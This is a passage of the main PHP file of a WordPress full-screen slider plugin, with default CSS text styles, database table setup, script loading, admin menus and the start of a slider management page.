<?php
/*
Plugin Name: LambertGroup - Full Screen Background and Full Width Slider
Description: This plugin can be used as Full Screen Multimedia Background, Full Screen Multimedia Gallery and Full Width Multimedia Slider with both Images and Videos
Version: 1.6.6
Author: Lambert Group
Author URI: https://1.envato.market/OZ5Zr
Text Domain: lbg-fullwidth
*/


$lbg_fullscreen_fullwidth_slider_path = trailingslashit(dirname(__FILE__));  //empty

//all the messages
$lbg_fullscreen_fullwidth_slider_messages = array(
		'version' => __( '<div class="error">LambertGroup - Full Screen Background and Full Width Slider plugin requires WordPress 3.0 or newer. <a href="https://codex.wordpress.org/Upgrading_WordPress">Please update!</a></div>', 'lbg-fullwidth' ),
		'empty_img' => __( 'Image - required', 'lbg-fullwidth' ),
		'empty_name' => __( 'Name - required', 'lbg-fullwidth' ),
		'invalid_request' => __( 'Invalid Request!', 'lbg-fullwidth' ),
		'generate_for_this_slider' => __( 'You can start customizing this slider.', 'lbg-fullwidth' ),
		'data_saved' => __( 'Data Saved!', 'lbg-fullwidth' )
	);
global $general_param; // for activation_hook only
$general_param = array(
	'css_styles_const' => '
.lbg_fullscreen_fullwidth_slider_textWhiteBgBlack_small {
	font-family: Arial;
	font-size:12px;
	line-height:12px;
	font-weight:bold;
	color:#FFF;
	background:#000;
	padding:5px 6px;
	margin:0;
}
.lbg_fullscreen_fullwidth_slider_textWhiteBgBlack_small a {
	color:#FFF;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textWhiteBgBlack_small a:hover {
	color:#F00;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textWhiteBgBlack_medium {
	font-family: Arial;
	font-size:22px;
	line-height:22px;
	font-weight:normal;
	color:#FFF;
	background:#000;
	padding:6px 7px;
	margin:0;
}
.lbg_fullscreen_fullwidth_slider_textWhiteBgBlack_medium a {
	color:#FFF;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textWhiteBgBlack_medium a:hover {
	color:#F00;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textWhiteBgBlack_large {
	font-family: Arial;
	font-size:36px;
	line-height:36px;
	font-weight:normal;
	color:#FFF;
	background:#000;
	padding:7px 10px;
	margin:0;
}
.lbg_fullscreen_fullwidth_slider_textWhiteBgBlack_large a {
	color:#FFF;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textWhiteBgBlack_large a:hover {
	color:#F00;
	text-decoration:underline;
}

.lbg_fullscreen_fullwidth_slider_textBlackBgWhite_small {
	font-family: Arial;
	font-size:12px;
	line-height:12px;
	font-weight:bold;
	color:#000;
	background:#FFF;
	padding:5px 6px;
	margin:0;
}
.lbg_fullscreen_fullwidth_slider_textBlackBgWhite_small a {
	color:#000;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textBlackBgWhite_small a:hover {
	color:#F00;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textBlackBgWhite_medium {
	font-family: Arial;
	font-size:22px;
	line-height:22px;
	font-weight:normal;
	color:#000;
	background:#FFF;
	padding:6px 7px;
	margin:0;
}
.lbg_fullscreen_fullwidth_slider_textBlackBgWhite_medium a {
	color:#000;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textBlackBgWhite_medium a:hover {
	color:#F00;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textBlackBgWhite_large {
	font-family: Arial;
	font-size:36px;
	line-height:36px;
	font-weight:normal;
	color:#000;
	background:#FFF;
	padding:7px 10px;
	margin:0;
}
.lbg_fullscreen_fullwidth_slider_textBlackBgWhite_large a {
	color:#000;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textBlackBgWhite_large a:hover {
	color:#F00;
	text-decoration:underline;
}

.lbg_fullscreen_fullwidth_slider_textRedBgWhite_small {
	font-family: Arial;
	font-size:12px;
	line-height:12px;
	font-weight:bold;
	color:#F00;
	background:#FFF;
	padding:5px 6px;
	margin:0;
}
.lbg_fullscreen_fullwidth_slider_textRedBgWhite_small a {
	color:#F00;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textRedBgWhite_small a:hover {
	color:#000;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textRedBgWhite_medium {
	font-family: Arial;
	font-size:22px;
	line-height:22px;
	font-weight:normal;
	color:#F00;
	background:#FFF;
	padding:6px 7px;
	margin:0;
}
.lbg_fullscreen_fullwidth_slider_textRedBgWhite_medium a {
	color:#F00;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textRedBgWhite_medium a:hover {
	color:#000;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textRedBgWhite_large {
	font-family: Arial;
	font-size:36px;
	line-height:36px;
	font-weight:normal;
	color:#F00;
	background:#FFF;
	padding:7px 10px;
	margin:0;
}
.lbg_fullscreen_fullwidth_slider_textRedBgWhite_large a {
	color:#F00;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textRedBgWhite_large a:hover {
	color:#000;
	text-decoration:underline;
}

.lbg_fullscreen_fullwidth_slider_textBlueBgWhite_small {
	font-family: Arial;
	font-size:12px;
	line-height:12px;
	font-weight:bold;
	color:#00F;
	background:#FFF;
	padding:5px 6px;
	margin:0;
}
.lbg_fullscreen_fullwidth_slider_textBlueBgWhite_small a {
	color:#00F;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textBlueBgWhite_small a:hover {
	color:#F00;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textBlueBgWhite_medium {
	font-family: Arial;
	font-size:22px;
	line-height:22px;
	font-weight:normal;
	color:#00F;
	background:#FFF;
	padding:6px 7px;
	margin:0;
}
.lbg_fullscreen_fullwidth_slider_textBlueBgWhite_medium a {
	color:#00F;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textBlueBgWhite_medium a:hover {
	color:#F00;
	text-decoration:underline;
}

.lbg_fullscreen_fullwidth_slider_textBlueBgWhite_large {
	font-family: Arial;
	font-size:36px;
	line-height:36px;
	font-weight:normal;
	color:#00F;
	background:#FFF;
	padding:7px 10px;
	margin:0;
}
.lbg_fullscreen_fullwidth_slider_textBlueBgWhite_large a {
	color:#00F;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textBlueBgWhite_large a:hover {
	color:#F00;
	text-decoration:underline;
}

.lbg_fullscreen_fullwidth_slider_textWhiteBgTransparent_small {
	font-family: Arial;
	font-size:12px;
	line-height:12px;
	font-weight:bold;
	color:#FFF;
	background:none;
	padding:0;
	margin:0;
}
.lbg_fullscreen_fullwidth_slider_textWhiteBgTransparent_small a {
	color:#FFF;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textWhiteBgTransparent_small a:hover {
	color:#F00;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textWhiteBgTransparent_medium {
	font-family: Arial;
	font-size:22px;
	line-height:22px;
	font-weight:normal;
	color:#FFF;
	background:none;
	padding:0;
	margin:0;
}
.lbg_fullscreen_fullwidth_slider_textWhiteBgTransparent_medium a {
	color:#FFF;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textWhiteBgTransparent_medium a:hover {
	color:#F00;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textWhiteBgTransparent_large {
	font-family: Arial;
	font-size:36px;
	line-height:36px;
	font-weight:normal;
	color:#FFF;
	background:none;
	padding:0;
	margin:0;
}
.lbg_fullscreen_fullwidth_slider_textWhiteBgTransparent_large a {
	color:#FFF;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textWhiteBgTransparent_large a:hover {
	color:#F00;
	text-decoration:underline;
}

.lbg_fullscreen_fullwidth_slider_textBlackBgTransparent_small {
	font-family: Arial;
	font-size:12px;
	line-height:12px;
	font-weight:bold;
	color:#000;
	background:none;
	padding:0;
	margin:0;
}
.lbg_fullscreen_fullwidth_slider_textBlackBgTransparent_small a {
	color:#000;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textBlackBgTransparent_small a:hover {
	color:#F00;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textBlackBgTransparent_medium {
	font-family: Arial;
	font-size:22px;
	line-height:22px;
	font-weight:normal;
	color:#000;
	background:none;
	padding:0;
	margin:0;
}
.lbg_fullscreen_fullwidth_slider_textBlackBgTransparent_medium a {
	color:#000;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textBlackBgTransparent_medium a:hover {
	color:#F00;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textBlackBgTransparent_large {
	font-family: Arial;
	font-size:36px;
	line-height:36px;
	font-weight:normal;
	color:#000;
	background:none;
	padding:0;
	margin:0;
}
.lbg_fullscreen_fullwidth_slider_textBlackBgTransparent_large a {
	color:#000;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textBlackBgTransparent_large a:hover {
	color:#F00;
	text-decoration:underline;
}

.lbg_fullscreen_fullwidth_slider_textRedBgTransparent_small {
	font-family: Arial;
	font-size:12px;
	line-height:12px;
	font-weight:bold;
	color:#F00;
	background:none;
	padding:0;
	margin:0;
}
.lbg_fullscreen_fullwidth_slider_textRedBgTransparent_small a {
	color:#F00;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textRedBgTransparent_small a:hover {
	color:#000;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textRedBgTransparent_medium {
	font-family: Arial;
	font-size:22px;
	line-height:22px;
	font-weight:normal;
	color:#F00;
	background:none;
	padding:0;
	margin:0;
}
.lbg_fullscreen_fullwidth_slider_textRedBgTransparent_medium a {
	color:#F00;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textRedBgTransparent_medium a:hover {
	color:#000;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textRedBgTransparent_large {
	font-family: Arial;
	font-size:36px;
	line-height:36px;
	font-weight:normal;
	color:#F00;
	background:none;
	padding:0;
	margin:0;
}
.lbg_fullscreen_fullwidth_slider_textRedBgTransparent_large a {
	color:#F00;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textRedBgTransparent_large a:hover {
	color:#000;
	text-decoration:underline;
}

.lbg_fullscreen_fullwidth_slider_textBlueBgTransparent_small {
	font-family: Arial;
	font-size:12px;
	line-height:12px;
	font-weight:bold;
	color:#00F;
	background:none;
	padding:0;
	margin:0;
}
.lbg_fullscreen_fullwidth_slider_textBlueBgTransparent_small a {
	color:#00F;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textBlueBgTransparent_small a:hover {
	color:#F00;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textBlueBgTransparent_medium {
	font-family: Arial;
	font-size:22px;
	line-height:22px;
	font-weight:normal;
	color:#00F;
	background:none;
	padding:0;
	margin:0;
}
.lbg_fullscreen_fullwidth_slider_textBlueBgTransparent_medium a {
	color:#00F;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textBlueBgTransparent_medium a:hover {
	color:#F00;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textBlueBgTransparent_large {
	font-family: Arial;
	font-size:36px;
	line-height:36px;
	font-weight:normal;
	color:#00F;
	background:none;
	padding:0;
	margin:0;
}
.lbg_fullscreen_fullwidth_slider_textBlueBgTransparent_large a {
	color:#00F;
	text-decoration:underline;
}
.lbg_fullscreen_fullwidth_slider_textBlueBgTransparent_large a:hover {
	color:#F00;
	text-decoration:underline;
}'
);


global $wp_version;

if ( !version_compare($wp_version,"3.0",">=")) {
	wp_die (esc_html($lbg_fullscreen_fullwidth_slider_messages['version'], 'lbg-fullwidth' ));
}




function lbg_fullscreen_fullwidth_slider_activate() {
	//db creation, create admin options etc.
	global $wpdb;
	global $general_param;


	$lbg_fullscreen_fullwidth_slider_collate = ' COLLATE utf8_general_ci';

	$sql0 = "CREATE TABLE `" . $wpdb->prefix . "lbg_fullscreen_fullwidth_slider_banners` (
			`id` INT UNSIGNED NOT NULL AUTO_INCREMENT ,
			`name` VARCHAR( 255 ) NOT NULL ,
			PRIMARY KEY ( `id` )
			) ENGINE=MyISAM  DEFAULT CHARSET=utf8";

	$sql1 = "CREATE TABLE `" . $wpdb->prefix . "lbg_fullscreen_fullwidth_slider_settings` (
  `id` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
  `width` smallint(5) unsigned NOT NULL DEFAULT '1920',
  `height` smallint(5) unsigned NOT NULL DEFAULT '600',
  `width100Proc` varchar(8) NOT NULL DEFAULT 'true',
  `height100Proc` varchar(8) NOT NULL DEFAULT 'true',
  `skin` varchar(255) NOT NULL DEFAULT 'bullets',
  `autoPlay` smallint(5) unsigned NOT NULL DEFAULT '6',
  `loop` varchar(8) NOT NULL DEFAULT 'true',
  `fadeSlides` varchar(8) NOT NULL DEFAULT 'true',
  `setAsBg` varchar(8) NOT NULL DEFAULT 'true',
  `texturePath` text,
  `target` varchar(8) NOT NULL DEFAULT '_blank',
  `showAllControllers` varchar(8) NOT NULL DEFAULT 'true',
  `showNavArrows` varchar(8) NOT NULL DEFAULT 'true',
  `showOnInitNavArrows` varchar(8) NOT NULL DEFAULT 'true',
  `autoHideNavArrows` varchar(8) NOT NULL DEFAULT 'true',
  `showBottomNav` varchar(8) NOT NULL DEFAULT 'true',
  `showOnInitBottomNav` varchar(8) NOT NULL DEFAULT 'true',
  `autoHideBottomNav` varchar(8) NOT NULL DEFAULT 'false',
  `showPreviewThumbs` varchar(8) NOT NULL DEFAULT 'false',
  `enableTouchScreen` varchar(8) NOT NULL DEFAULT 'true',
  `pauseOnMouseOver` varchar(8) NOT NULL DEFAULT 'true',
  `showCircleTimer` varchar(8) NOT NULL DEFAULT 'true',
  `circleRadius` smallint(5) unsigned NOT NULL DEFAULT '10',
  `circleLineWidth` smallint(5) unsigned NOT NULL DEFAULT '4',
  `circleColor` varchar(8) NOT NULL DEFAULT 'ff0000',
  `circleAlpha` smallint(5) unsigned NOT NULL DEFAULT '100',
  `behindCircleColor` varchar(8) NOT NULL DEFAULT '000000',
  `behindCircleAlpha` smallint(5) unsigned NOT NULL DEFAULT '50',
  `responsive` varchar(8) NOT NULL DEFAULT 'false',
  `responsiveRelativeToBrowser` varchar(8) NOT NULL DEFAULT 'true',
  `numberOfThumbsPerScreen` smallint(5) unsigned NOT NULL DEFAULT '0',
  `bottomNavPos` varchar(8) NOT NULL DEFAULT 'right',
  `bottomNavLateralMargin` smallint(5) unsigned NOT NULL DEFAULT '25',
  `thumbsWrapperMarginTop` smallint(5) NOT NULL DEFAULT '-55',
  `thumbsWrapperBgImage` text,
  `thumbsWrapperBgHexa` varchar(8),
  `thumbsBorderColorON` varchar(8) NOT NULL DEFAULT '000000',
  `thumbsBorderColorOFF` varchar(8) NOT NULL DEFAULT '7a7a7a',
  `videoProportionWidth` smallint(5) unsigned NOT NULL DEFAULT '16',
	  PRIMARY KEY  (`id`)
	) ENGINE=MyISAM  DEFAULT CHARSET=utf8";

	$sql2 = "CREATE TABLE `". $wpdb->prefix . "lbg_fullscreen_fullwidth_slider_playlist` (
	  `id` int(10) unsigned NOT NULL auto_increment,
	  `bannerid` int(10) unsigned NOT NULL,
	  `img` text,
	  `thumbnail` text,
	  `alt_text` text,
	  `content` text,
	  `data-video` varchar(8),
	  `data-link` text,
	  `data-target` varchar(8),
	  `ord` int(10) unsigned NOT NULL,
	  PRIMARY KEY  (`id`)
	) ENGINE=MyISAM  DEFAULT CHARSET=utf8";

	$sql3 = "CREATE TABLE `". $wpdb->prefix . "lbg_fullscreen_fullwidth_slider_texts` (
	  `id` int(10) unsigned NOT NULL auto_increment,
	  `photoid` int(10) unsigned NOT NULL,
	  `img_src` text,
	  `content` text,
	  `data-initial-left` smallint(5),
	  `data-initial-top` smallint(5),
	  `data-final-left` smallint(5),
	  `data-final-top` smallint(5),
	  `data-duration` float unsigned,
	  `data-fade-start` smallint(5) unsigned,
	  `data-delay` float unsigned,
	  `css` text,
	  `ord` int(10) unsigned NOT NULL,
	  PRIMARY KEY  (`id`)
	) ENGINE=MyISAM  DEFAULT CHARSET=utf8";

	$sql4 = "CREATE TABLE `". $wpdb->prefix . "lbg_fullscreen_fullwidth_slider_css_definitions` (
	  `id` int(2) unsigned NOT NULL auto_increment,
	  `css_styles` text,
	  `css_styles_orig` text,
	  PRIMARY KEY  (`id`)
	) ENGINE=MyISAM  DEFAULT CHARSET=utf8";

	require_once(ABSPATH . 'wp-admin/includes/upgrade.php');
	dbDelta($sql0.$lbg_fullscreen_fullwidth_slider_collate);
	dbDelta($sql1.$lbg_fullscreen_fullwidth_slider_collate);
	dbDelta($sql2.$lbg_fullscreen_fullwidth_slider_collate);
	dbDelta($sql3.$lbg_fullscreen_fullwidth_slider_collate);
	dbDelta($sql4.$lbg_fullscreen_fullwidth_slider_collate);

	//initialize the banners table with the first banner type
	$rows_count = $wpdb->get_var( "SELECT COUNT(*) FROM ". $wpdb->prefix ."lbg_fullscreen_fullwidth_slider_banners;" );
	if (!$rows_count) {
		$wpdb->insert(
			$wpdb->prefix . "lbg_fullscreen_fullwidth_slider_banners",
			array(
				'name' => 'First Slider'
			),
			array(
				'%s'
			)
		);
	}

	// initialize the settings
	$rows_count = $wpdb->get_var( "SELECT COUNT(*) FROM ". $wpdb->prefix ."lbg_fullscreen_fullwidth_slider_settings;" );
	if (!$rows_count) {
		lbg_fullscreen_fullwidth_slider_insert_settings_record(1);
	}

	//initialize the css styles
	$rows_count = $wpdb->get_var( "SELECT COUNT(*) FROM ". $wpdb->prefix ."lbg_fullscreen_fullwidth_slider_css_definitions;" );
	if (!$rows_count) {
		$wpdb->insert(
			$wpdb->prefix . "lbg_fullscreen_fullwidth_slider_css_definitions",
			array(
				'css_styles' => $general_param['css_styles_const'],
				'css_styles_orig' => $general_param['css_styles_const']
			),
			array(
				'%s',
				'%s'
			)
		);
	}

}



function lbg_fullscreen_fullwidth_slider_insert_settings_record($banner_id) {
	global $wpdb;
	$wpdb->insert(
			$wpdb->prefix . "lbg_fullscreen_fullwidth_slider_settings",
			array(
				'width' => 1920,
				'height' => 600,
				'skin' => 'bullets'
			),
			array(
				'%d',
				'%d',
				'%s'
			)
		);
}


function lbg_fullscreen_fullwidth_slider_init_sessions() {
	global $wpdb;
	if (!session_id()) {
		session_start();

		//initialize the session
		if (!isset($_SESSION['xid'])) {
			$safe_sql="SELECT * FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_banners) LIMIT 0, 1";
			$row = $wpdb->get_row($safe_sql,ARRAY_A);
    		$_SESSION['xid'] = $row['id'];
    		$_SESSION['xname'] = $row['name'];
			  $_SESSION['duplicate_layer']=0;
		}
	}
}


function lbg_fullscreen_fullwidth_slider_load_styles() {
	global $wpdb;
	if(strpos($_SERVER['PHP_SELF'], 'wp-admin') !== false) {
		$page = (isset($_GET['page'])) ? $_GET['page'] : '';
		if(preg_match('/lbg_fullscreen_fullwidth_slider/i', $page)) {
			wp_enqueue_style('lbg-jquery-ui-custom_css', 'https://ajax.googleapis.com/ajax/libs/jqueryui/1.10.3/themes/pepper-grinder/jquery-ui.min.css');
			wp_enqueue_style('lbg-fullscreen-fullwidth-slider-css', plugins_url('css/styles.css', __FILE__));
			wp_enqueue_style('lbg-fullscreen-fullwidth-slider-colorpicker-css', plugins_url('css/colorpicker/colorpicker.css', __FILE__));


			wp_enqueue_style('thickbox');

			wp_enqueue_style('lbg-fullscreen-fullwidth-slider-site-css', plugins_url('fulscreen_background/fullscreen_background.css', __FILE__));
		}
	} else if (!is_admin()) { //loads css in front-end
		wp_enqueue_style('lbg-fullscreen-fullwidth-slider-site-css', plugins_url('fulscreen_background/fullscreen_background.css', __FILE__));
		wp_enqueue_style('lbg-fullscreen-fullwidth-slider-text-classes', plugins_url('fulscreen_background/text_classes.css', __FILE__));
	}
}

function lbg_fullscreen_fullwidth_slider_load_scripts() {
	global $is_IE;
	$page = (isset($_GET['page'])) ? $_GET['page'] : '';
	if(preg_match('/lbg_fullscreen_fullwidth_slider/i', $page)) {
		//loads scripts in admin
			wp_enqueue_script('jquery');

			wp_enqueue_script('jquery-ui-core');
			wp_enqueue_script('jquery-ui-widget');
			wp_enqueue_script('jquery-ui-mouse');
			wp_enqueue_script('jquery-ui-accordion');
			wp_enqueue_script('jquery-ui-autocomplete');
			wp_enqueue_script('jquery-ui-slider');
			wp_enqueue_script('jquery-ui-tabs');
			wp_enqueue_script('jquery-ui-sortable');
			wp_enqueue_script('jquery-ui-draggable');
			wp_enqueue_script('jquery-ui-droppable');
			wp_enqueue_script('jquery-ui-selectable');
			wp_enqueue_script('jquery-ui-position');
			wp_enqueue_script('jquery-ui-datepicker');
			wp_enqueue_script('jquery-ui-resizable');
			wp_enqueue_script('jquery-ui-dialog');
			wp_enqueue_script('jquery-ui-button');

			wp_enqueue_script('jquery-form');
			wp_enqueue_script('jquery-color');
			wp_enqueue_script('jquery-masonry');
			wp_enqueue_script('jquery-ui-progressbar');
			wp_enqueue_script('jquery-ui-tooltip');

			wp_enqueue_script('jquery-effects-core');
			wp_enqueue_script('jquery-effects-blind');
			wp_enqueue_script('jquery-effects-bounce');
			wp_enqueue_script('jquery-effects-clip');
			wp_enqueue_script('jquery-effects-drop');
			wp_enqueue_script('jquery-effects-explode');
			wp_enqueue_script('jquery-effects-fade');
			wp_enqueue_script('jquery-effects-fold');
			wp_enqueue_script('jquery-effects-highlight');
			wp_enqueue_script('jquery-effects-pulsate');
			wp_enqueue_script('jquery-effects-scale');
			wp_enqueue_script('jquery-effects-shake');
			wp_enqueue_script('jquery-effects-slide');
			wp_enqueue_script('jquery-effects-transfer');

			wp_register_script('lbg-admin-jquery-ui-core', includes_url().'js/jquery/ui/core.min.js');
			wp_enqueue_script('lbg-admin-jquery-ui-core');

			wp_register_script('lbg-admin-jquery-ui-widget', includes_url().'js/jquery/ui/widget.min.js');
			wp_enqueue_script('lbg-admin-jquery-ui-widget');

			wp_register_script('lbg-admin-jquery-ui-mouse', includes_url().'js/jquery/ui/mouse.min.js');
			wp_enqueue_script('lbg-admin-jquery-ui-mouse');

			wp_register_script('lbg-admin-jquery-ui-draggable', includes_url().'js/jquery/ui/draggable.min.js');
			wp_enqueue_script('lbg-admin-jquery-ui-draggable');

			wp_register_script('lbg-colorpicker', plugins_url('js/colorpicker/colorpicker.js', __FILE__));
			wp_enqueue_script('lbg-colorpicker');

			wp_register_script('lbg-admin-toggle', plugins_url('js/myToggle.js', __FILE__));
			wp_enqueue_script('lbg-admin-toggle');

			wp_enqueue_script('media-upload'); // before w.p 3.5
			wp_enqueue_media();// from w.p 3.5
			wp_enqueue_script('thickbox');

	} else if (!is_admin()) { //loads scripts in front-end

		wp_enqueue_script('jquery');
			wp_enqueue_script('jquery-ui-core');
				wp_enqueue_script('jquery-ui-widget');

			wp_enqueue_script('jquery-effects-core');
			wp_enqueue_script('jquery-effects-transfer');

		wp_register_script('lbg-touchSwipe', plugins_url('fulscreen_background/js/jquery.touchSwipe.min.js', __FILE__));
		wp_enqueue_script('lbg-touchSwipe');

		wp_register_script('lbg-lbg-fullscreen-fullwidth-slider', plugins_url('fulscreen_background\js\fullscreen_background.js', __FILE__));
		wp_enqueue_script('lbg-lbg-fullscreen-fullwidth-slider');

	}




}



// adds the menu pages
function lbg_fullscreen_fullwidth_slider_plugin_menu() {
	add_menu_page('LBG_FULLSCREEN_FULLWIDTH_SLIDER Admin Interface', 'FULLSCREEN FULLWIDTH SLIDER', 'edit_posts', 'lbg_fullscreen_fullwidth_slider', 'lbg_fullscreen_fullwidth_slider_overview_page',
	plugins_url('images/plg_icon.png', __FILE__));
	add_submenu_page( 'lbg_fullscreen_fullwidth_slider', 'LBG_FULLSCREEN_FULLWIDTH_SLIDER Overview', 'Overview', 'edit_posts', 'lbg_fullscreen_fullwidth_slider', 'lbg_fullscreen_fullwidth_slider_overview_page');
	add_submenu_page( 'lbg_fullscreen_fullwidth_slider', 'LBG_FULLSCREEN_FULLWIDTH_SLIDER Manage Sliders', 'Manage Sliders', 'edit_posts', 'lbg_fullscreen_fullwidth_slider_Manage_Sliders', 'lbg_fullscreen_fullwidth_slider_manage_sliders_page');
	add_submenu_page( 'lbg_fullscreen_fullwidth_slider', 'LBG_FULLSCREEN_FULLWIDTH_SLIDER Manage Sliders Add New', 'Add New', 'edit_posts', 'lbg_fullscreen_fullwidth_slider_Add_New', 'lbg_fullscreen_fullwidth_slider_manage_sliders_add_new_page');
	add_submenu_page( 'lbg_fullscreen_fullwidth_slider_Manage_Sliders', 'LBG_FULLSCREEN_FULLWIDTH_SLIDER Slider Settings', 'Slider Settings', 'edit_posts', 'lbg_fullscreen_fullwidth_slider_Settings', 'lbg_fullscreen_fullwidth_slider_settings_page');
	add_submenu_page( 'lbg_fullscreen_fullwidth_slider_Manage_Sliders', 'LBG_FULLSCREEN_FULLWIDTH_SLIDER Slider Playlist', 'Playlist', 'edit_posts', 'lbg_fullscreen_fullwidth_slider_Playlist', 'lbg_fullscreen_fullwidth_slider_playlist_page');
	add_submenu_page( 'lbg_fullscreen_fullwidth_slider_Manage_Sliders', 'LBG_FULLSCREEN_FULLWIDTH_SLIDER Edit Elements', 'Edit Elements', 'edit_posts', 'lbg_fullscreen_fullwidth_slider_Edit_Elements', 'lbg_fullscreen_fullwidth_slider_editElements_page');
	add_submenu_page( 'lbg_fullscreen_fullwidth_slider', 'LBG_FULLSCREEN_FULLWIDTH_SLIDER Help', 'Help', 'edit_posts', 'lbg_fullscreen_fullwidth_slider_Help', 'lbg_fullscreen_fullwidth_slider_help_page');
}


//HTML content for overview page
function lbg_fullscreen_fullwidth_slider_overview_page()
{
	global $lbg_fullscreen_fullwidth_slider_path;
	include_once($lbg_fullscreen_fullwidth_slider_path . 'tpl/overview.php');
}

//HTML content for Manage Banners
function lbg_fullscreen_fullwidth_slider_manage_sliders_page()
{
	global $wpdb;
	global $lbg_fullscreen_fullwidth_slider_messages;
	global $lbg_fullscreen_fullwidth_slider_path;

	//delete banner
	if (isset($_GET['id'])) {

		//delete from wp_lbg_fullscreen_fullwidth_slider_banners
		$wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."lbg_fullscreen_fullwidth_slider_banners WHERE id = %d",$_GET['id']));

		//delete from wp_lbg_fullscreen_fullwidth_slider_settings
		$wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."lbg_fullscreen_fullwidth_slider_settings WHERE id = %d",$_GET['id']));

		//delete lbg_fullscreen_fullwidth_slider_texts
		$safe_sql=$wpdb->prepare("SELECT id FROM ".$wpdb->prefix."lbg_fullscreen_fullwidth_slider_playlist WHERE bannerid = %d",$_GET['id']);
		$result = $wpdb->get_results($safe_sql,ARRAY_A);
		if ($wpdb->num_rows) {
			foreach ( $result as $row ) {
				$wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."lbg_fullscreen_fullwidth_slider_texts WHERE photoid = %d",$row['id']));
			}
		}

		//delete from wp_lbg_fullscreen_fullwidth_slider_playlist
		$wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."lbg_fullscreen_fullwidth_slider_playlist WHERE bannerid = %d",$_GET['id']));

		//initialize the session
		$safe_sql="SELECT * FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_banners) ORDER BY id";
		$row = $wpdb->get_row($safe_sql,ARRAY_A);
		$row=lbg_fullscreen_fullwidth_slider_unstrip_array($row);
		if ($row['id']) {
			$_SESSION['xid']=$row['id'];
			$_SESSION['xname']=$row['name'];
		}
	}

	if (array_key_exists('duplicate_id', $_GET) && $_GET['duplicate_id']!='') {
			//banners
			$safe_sql=$wpdb->prepare( "INSERT INTO ".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_banners ( `name` ) SELECT `name` FROM (".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_banners) WHERE id = %d",$_GET['duplicate_id'] );
			$wpdb->query($safe_sql);
			$bannerid=$wpdb->insert_id;

			//settings
			$safe_sql=$wpdb->prepare( "INSERT INTO ".$wpdb->prefix ."lbg_fullscreen_fullwidth_slider_settings (`width`, `height`, `width100Proc`, `height100Proc`, `skin`, `autoPlay`, `loop`, `target`, `showAllControllers`, `showNavArrows`, `showOnInitNavArrows`, `autoHideNavArrows`, `showBottomNav`, `showOnInitBottomNav`, `autoHideBottomNav`, `showPreviewThumbs`, `enableTouchScreen`, `pauseOnMouseOver`, `showCircleTimer`, `circleRadius`, `circleLineWidth`, `circleColor`, `circleAlpha`, `behindCircleColor`, `behindCircleAlpha`, `responsive`, `responsiveRelativeToBrowser`, `thumbsWrapperMarginTop`, `numberOfThumbsPerScreen`, `fadeSlides`, `setAsBg`, `texturePath`, `bottomNavPos`, `bottomNavLateralMargin`, `thumbsWrapperBgImage`, `thumbsWrapperBgHexa`, `thumbsBorderColorON`, `thumbsBorderColorOFF`, `videoProportionWidth` ) SELECT `width`, `height`, `width100Proc`, `height100Proc`, `skin`, `autoPlay`, `loop`, `target`, `showAllControllers`, `showNavArrows`, `showOnInitNavArrows`, `autoHideNavArrows`, `showBottomNav`, `showOnInitBottomNav`, `autoHideBottomNav`, `showPreviewThumbs`, `enableTouchScreen`, `pauseOnMouseOver`, `showCircleTimer`, `circleRadius`, `circleLineWidth`, `circleColor`, `circleAlpha`, `behindCircleColor`, `behindCircleAlpha`, `responsive`, `responsiveRelativeToBrowser`, `thumbsWrapperMarginTop`, `numberOfThumbsPerScreen`, `fadeSlides`, `setAsBg`, `texturePath`, `bottomNavPos`, `bottomNavLateralMargin`, `thumbsWrapperBgImage`, `thumbsWrapperBgHexa`, `thumbsBorderColorON`, `thumbsBorderColorOFF`, `videoProportionWidth` FROM 